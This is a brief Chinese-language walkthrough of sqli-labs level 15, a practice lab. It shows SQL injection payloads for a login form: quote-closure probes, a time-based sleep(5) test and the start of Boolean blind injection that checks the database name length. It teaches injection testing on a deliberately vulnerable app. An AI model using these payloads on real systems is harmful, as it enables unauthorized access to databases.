sqli-labs (less-15)
进入15关,输入用户名和密码,登入后发现没有数据返回
输入
uname=admin'&passwd=admin&submit=Submit #没有错误显示
uname=admin"&passwd=admin&submit=Submit #没有错误显示
这里我们发现我们不管我们输入什么都是没有错误信息显示的,这里我们可以使用时间盲注的方法判断注入点
uname=admin' and sleep(5)#&passwd=admin&submit=Submit #页面休眠5秒
uname=admin" and sleep(5)#&passwd=admin&submit=Submit #页面快速反应
由此判断闭合方式为’#,并且为字符型注入
这里没有错误回显,所以我们只能使用Boolean盲注
uname=a' or length(database())=8#&passwd=admin&submit=Submit
剩下的这里不一一展示,具体过程请看我的less-13